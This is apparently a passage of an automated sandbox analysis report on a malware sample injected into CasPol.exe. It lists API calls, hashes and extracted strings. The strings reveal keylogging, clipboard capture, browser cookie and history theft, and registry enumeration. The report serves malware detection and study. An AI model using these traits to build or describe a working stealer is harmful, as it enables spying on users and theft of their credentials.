                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                                          • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                                                                                                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                                          • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 100091D0
                                                                                                                                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                          • _free.LIBCMT ref: 100091E2
                                                                                                                                                                          • _free.LIBCMT ref: 100091F4
                                                                                                                                                                          • _free.LIBCMT ref: 10009206
                                                                                                                                                                          • _free.LIBCMT ref: 10009218
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                          • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                                          • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                          • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 00444106
                                                                                                                                                                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                          • _free.LIBCMT ref: 00444118
                                                                                                                                                                          • _free.LIBCMT ref: 0044412B
                                                                                                                                                                          • _free.LIBCMT ref: 0044413C
                                                                                                                                                                          • _free.LIBCMT ref: 0044414D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                                          • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                                                                                                          • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                                                                                          • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                                                                                                          APIs
                                                                                                                                                                          • _free.LIBCMT ref: 1000536F
                                                                                                                                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                          • _free.LIBCMT ref: 10005381
                                                                                                                                                                          • _free.LIBCMT ref: 10005394
                                                                                                                                                                          • _free.LIBCMT ref: 100053A5
                                                                                                                                                                          • _free.LIBCMT ref: 100053B6
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                          • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                          • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                                          • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                          • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0041763E
                                                                                                                                                                          • GetWindowTextW.USER32(?,?,0000012C), ref: 00417670
                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 00417677
                                                                                                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                                                                                          • String ID: (VG
                                                                                                                                                                          • API String ID: 3142014140-3443974315
                                                                                                                                                                          • Opcode ID: 03ec91c272319b82483b2025ec8c7941203cead915101a711102ef9fde642a14
                                                                                                                                                                          • Instruction ID: 57afc706987f0d359dfa573bc041c79e98ae29994c94316b8148008c339bd05b
                                                                                                                                                                          • Opcode Fuzzy Hash: 03ec91c272319b82483b2025ec8c7941203cead915101a711102ef9fde642a14
                                                                                                                                                                          • Instruction Fuzzy Hash: 6E7109311082419AC365FB22D8959EFB3E5BFD4308F50493FF18A560E5EF746A49CB8A
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Enum$InfoQueryValue
                                                                                                                                                                          • String ID: [regsplt]
                                                                                                                                                                          • API String ID: 3554306468-4262303796
                                                                                                                                                                          • Opcode ID: e94edd3d2a55c356d4548ef980033c45c7e3dae0b14fa2fe493c2e04fae217b1
                                                                                                                                                                          • Instruction ID: fa843d34e07254c46a29a5d4d7bbb73928c81f50e0ccc4a220fcc0531dc04ae2
                                                                                                                                                                          • Opcode Fuzzy Hash: e94edd3d2a55c356d4548ef980033c45c7e3dae0b14fa2fe493c2e04fae217b1
                                                                                                                                                                          • Instruction Fuzzy Hash: DF512C72900219AADB11EB95DC86EEEB77DAF04304F1000BAE505F6191EF746B48CBA9
                                                                                                                                                                          APIs
                                                                                                                                                                          • _strpbrk.LIBCMT ref: 0044E7B8
                                                                                                                                                                          • _free.LIBCMT ref: 0044E8D5
                                                                                                                                                                            • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                                                                                                                                            • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                                                                                                                            • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                                                                                          • String ID: *?$.
                                                                                                                                                                          • API String ID: 2812119850-3972193922
                                                                                                                                                                          • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                                                          • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                                                                                                                          • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                                                                                          • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00443515
                                                                                                                                                                          • _free.LIBCMT ref: 004435E0
                                                                                                                                                                          • _free.LIBCMT ref: 004435EA
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                          • API String ID: 2506810119-3657627342
                                                                                                                                                                          • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                                                          • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                                                                                                          • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                                                                                          • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 10004C1D
                                                                                                                                                                          • _free.LIBCMT ref: 10004CE8
                                                                                                                                                                          • _free.LIBCMT ref: 10004CF2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                          • API String ID: 2506810119-3657627342
                                                                                                                                                                          • Opcode ID: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                          • Instruction ID: 12f2da1a58c9c923660241357757b5dddff340f6d61411cdc8d35d961f62cc7a
                                                                                                                                                                          • Opcode Fuzzy Hash: f4d765c9bb58478f6d614cb19d249666f691a76f34bd4fd838862d42c91d6eee
                                                                                                                                                                          • Instruction Fuzzy Hash: EB31A0B5A01258EFFB51CF99CC81D9EBBFCEB88390F12806AF80497215DA709E41CB54
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                                                                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,7570D4DF,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                                                                                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                          • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                                                                                          • String ID: /sort "Visit Time" /stext "$@NG
                                                                                                                                                                          • API String ID: 368326130-3944316004
                                                                                                                                                                          • Opcode ID: 52ec7f42e83cb3d51f18f6545fe4dfece75fe75313d577a648afb874b5f25b75
                                                                                                                                                                          • Instruction ID: 88307c0d9f74f86904655d2c31cb74d6ebeba16a9e6c7dae8368527950f1c452
                                                                                                                                                                          • Opcode Fuzzy Hash: 52ec7f42e83cb3d51f18f6545fe4dfece75fe75313d577a648afb874b5f25b75
                                                                                                                                                                          • Instruction Fuzzy Hash: EB316171A001195ACB15FBA6DC969ED7375AF90308F00007FF60AB71E2EF785E49CA99
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Init_thread_footer__onexit
                                                                                                                                                                          • String ID: [End of clipboard]$[Text copied to clipboard]$ mG
                                                                                                                                                                          • API String ID: 1881088180-2322839566
                                                                                                                                                                          • Opcode ID: f198baba7c6da98f7617eda9bb62b56e34bd4f8c8b4818ed2bcf8c9541119a36
                                                                                                                                                                          • Instruction ID: 5c7e69c9d376070a9f10adc198010d279a990252db190bacd7f595afc81a80c0
                                                                                                                                                                          • Opcode Fuzzy Hash: f198baba7c6da98f7617eda9bb62b56e34bd4f8c8b4818ed2bcf8c9541119a36
                                                                                                                                                                          • Instruction Fuzzy Hash: B5216D31A102198ACB14FBA6D8929EDB375AF54318F10403FE506771E2EF7C6D4ACA8C
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00416330
                                                                                                                                                                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                                                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                                                                            • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                                                                                                                            • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$CloseCreateValue
                                                                                                                                                                          • String ID: !D@$h}v$okmode
                                                                                                                                                                          • API String ID: 3411444782-3374175755
                                                                                                                                                                          • Opcode ID: 1153397b0ef98b1b758b13ed2a4ada686c8c2e04d8d90db1aa4fc91eae461d34
                                                                                                                                                                          • Instruction ID: 3691d04bdc76b081f03c0e50e7d604d291fd2bc6213442c77ae478975c73e837
                                                                                                                                                                          • Opcode Fuzzy Hash: 1153397b0ef98b1b758b13ed2a4ada686c8c2e04d8d90db1aa4fc91eae461d34
                                                                                                                                                                          • Instruction Fuzzy Hash: E211A871B042011BDA187B72D822BBD2296DB84349F80483FF50AAF2E2DFBD4C51535D
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                                                                                                                                          Strings
                                                                                                                                                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                                                                                                          • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                          • API String ID: 1174141254-1980882731
                                                                                                                                                                          • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                                                                                          • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                                                                                                          • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                                                                                          • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                                                                                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                                                                                                                                          Strings
                                                                                                                                                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                                                                                                          • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ExistsFilePath
                                                                                                                                                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                                                                                          • API String ID: 1174141254-1980882731
                                                                                                                                                                          • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                                                                                          • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                                                                                                          • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                                                                                          • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                          • wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: EventLocalTimewsprintf
                                                                                                                                                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                                                                                          • API String ID: 1497725170-1359877963
                                                                                                                                                                          • Opcode ID: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                                                                                                                          • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                                                                                                          • Opcode Fuzzy Hash: 06c3bad099b03f5bfd1d77d0a6934743afda3855c33f854b134d7284dad7d650
                                                                                                                                                                          • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                                                                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                                                                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateThread$LocalTime$wsprintf
                                                                                                                                                                          • String ID: Online Keylogger Started
                                                                                                                                                                          • API String ID: 112202259-1258561607
                                                                                                                                                                          • Opcode ID: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                                                                                                                          • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                                                                                                          • Opcode Fuzzy Hash: 365fe234e7c63b24606a5b5b17b3dee8777c5a3443b42bc0c5888d8fa6c2e7ce
                                                                                                                                                                          • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
